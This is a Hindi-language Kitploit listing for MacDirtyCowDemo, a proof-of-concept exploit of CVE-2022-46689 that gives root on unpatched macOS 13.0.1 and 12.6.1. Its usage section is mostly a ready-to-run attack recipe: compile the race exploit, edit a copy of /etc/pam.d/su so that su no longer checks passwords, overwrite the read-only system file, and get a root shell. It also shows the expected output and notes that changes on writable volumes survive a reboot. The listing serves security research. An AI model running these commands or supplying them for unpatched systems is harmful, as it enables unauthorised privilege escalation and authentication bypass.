Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
MacDirtyCowDemo — macOS 13.0.1 पर CVE-2022-46689 (Dirty Cow बग का macOS समतुल्य) का उपयोग करके रूट प्राप्त करें, Apple के XNU स्रोत से निकाले गए टेस्टकेस का उपयोग करके। | Kitploit
उपकरण/GitHubGitHub/zhuowei/macdirtycowdemo
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगबाइनरी शोषण
GitHubzhuowei/macdirtycowdemo

MacDirtyCowDemo

macOS 13.0.1 पर CVE-2022-46689 (Dirty Cow बग का macOS समतुल्य) का उपयोग करके रूट प्राप्त करें, Apple के XNU स्रोत से निकाले गए टेस्टकेस का उपयोग करके।

रिपॉजिटरी देखें
410353 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

macOS 13.0.1 पर CVE-2022-46689 (डर्टी काउ बग का macOS समतुल्य) का उपयोग करके रूट प्राप्त करें, Apple के XNU स्रोत से निकाले गए टेस्टकेस का उपयोग करके।

https://worthdoingbadly.com/macdirtycow/

उपयोग

macOS 13.0.1 / 12.6.1 (या उससे नीचे) मशीन पर, निम्न चलाएँ:

root@kitploit:~
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su

आपको यह मिलना चाहिए:

root@kitploit:~
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2# 

SIP बंद होने पर macOS 13 beta (22A5266r) पर परीक्षण किया गया (यह SIP चालू होने पर भी काम करेगा)।

यदि आपका सिस्टम पूरी तरह से पैच किया गया है (macOS 13.1 / 12.6.2), तो इसे इसके बजाय पढ़ना चाहिए:

root@kitploit:~
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure

और su चलाने पर अभी भी पासवर्ड माँगना चाहिए।

सील्ड सिस्टम वॉल्यूम के लिए धन्यवाद, /System वॉल्यूम पर किसी भी फ़ाइल पर इसे चलाने से फ़ाइल केवल अस्थायी रूप से संशोधित होती है: यह रीबूट पर रीवर्ट हो जाती है। इसे लिखने योग्य वॉल्यूम पर किसी फ़ाइल पर चलाने से संशोधन रीबूट के बाद भी संरक्षित होता है।

क्रेडिट्स

  • समस्या का पता लगाने के लिए प्रोजेक्ट जीरो के इयान बीयर। आपकी Writeup का इंतज़ार है!
  • टेस्ट केस के लिए Apple। (मैंने कुछ नहीं बदला: मैंने सिर्फ़ ओवरराइट करने के लिए कंट्रोल करने के लिए कमांड लाइन पैरामीटर जोड़ा।)
  • /etc/pam.d का उपयोग करके पासवर्ड चेकिंग को अक्षम करने की तरकीब के लिए SSLab@Gatech।
टूल डाउनलोड करें